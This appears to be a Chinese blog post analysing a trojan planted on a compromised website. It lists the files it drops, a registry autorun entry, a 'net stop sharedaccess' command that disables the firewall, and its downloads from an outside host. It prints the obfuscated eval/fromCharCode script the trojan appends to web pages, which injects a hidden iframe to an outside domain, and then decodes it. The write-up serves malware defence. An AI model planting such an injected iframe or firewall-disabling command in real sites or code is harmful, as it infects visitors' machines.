解读网站被挂其中木马分析js+eval实现

所属分类: 实用技巧 / 病毒查杀 阅读数: 379
收藏 0 赞 0 分享

在FF看到这消息.. 于是就把网页解开了..
原来是"老朋友"刺客集团 .. 已经多次和这个集团生成的网马打交道了..

其中挂上一个木马
hxxp://www.xxxx.com/pic/ddb/2006692151148920.gif

就此做个分析吧..
运行样本.
释放文件
C:\win30.exe
调用cmd 运行命令 /c net stop sharedaccess

访问网站
61.129.102.79
地址应该是:hxxp://www.xxxx.com 80端口通讯

下载:hxxp://www.xxxx.com/es86/db/dvbbs.mdb
此文件为rar 文件..

dvbbs.mdb 释放出文件为
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe

写入注册表
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe"

在 htm 和 aspx 尾部加入代码
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

解密为
<script>
p="<iframe height=0 width=0 src="http://a-l.meibu.com/"></iframe>"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

在线扫描
AntiVir 7.3.1.38 03.02.2007 TR/Crypt.NSPM.Gen 
BitDefender 7.2 03.02.2007 DeepScan:Generic.Malware.PWYddldPk.D212BB22 
eSafe 7.0.14.0 02.28.2007 suspicious Trojan/Worm 
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader 
Ikarus T3.1.1.3 03.02.2007 Backdoor.Win32.Hupigon.BV 
NOD32v2 2090 03.02.2007 a variant of Win32/Delf.AG 
Norman 5.80.02 03.02.2007 W32/Downloader 
Panda 9.0.0.4 03.01.2007 Suspicious file 

以上分析都在虚拟机里完成的..
这次加的壳实在脱不开..无法查看更详细..

不过猜测 编写语言为 Borland Delphi 6.0 - 7.0
尝试关闭一些安全软件 估计也有..

=.= 再此感叹..这什么破壳..

更多精彩内容其他人还在看

手工毒霸删除瓢虫病毒的图文教程第1/3页

手工毒霸删除瓢虫病毒的图文教程
收藏 0 赞 0 分享

19.exe,pagefile.pif专杀 pagefile.pif病毒 auto.inf

手工查杀新落雪病毒(19.exe,pagefile.pif,autorun.inf)
收藏 0 赞 0 分享

happy2008病毒专杀 happy2008病毒

Happy2008.zip病毒分析手动解决
收藏 0 赞 0 分享

avwghmn.dll svchost.exe病毒删除方法

avwghmn.dll svchost.exe病毒删除方法
收藏 0 赞 0 分享

木马程序Trojan-Spy.Win32.Agent.cfu清除方法

木马程序Trojan-Spy.Win32.Agent.cfu清除方法
收藏 0 赞 0 分享

Downloader Win32.Delf.dqu(IRAT.rmvb,mm.exe)分析查杀

Downloader Win32.Delf.dqu(IRAT.rmvb,mm.exe)分析查杀
收藏 0 赞 0 分享

中病毒后常用的解决方法病毒终极解决方案

中病毒后常用的解决方法病毒终极解决方案
收藏 0 赞 0 分享

系统时间改为2000年 修改系统时间病毒

系统时间改为2000年 修改系统时间病毒
收藏 0 赞 0 分享

病毒的万能查杀方法第1/2页

当发现病毒后,不要害怕,我们可以按照下面的方法,去试试,一般只需要不要给病毒运行的机会就可以了,一般进安全模式,去除病毒可能隐藏的启动项里。
收藏 0 赞 0 分享

sreng免费下载 sreng最新版下载

病毒查找利器
收藏 0 赞 0 分享
查看更多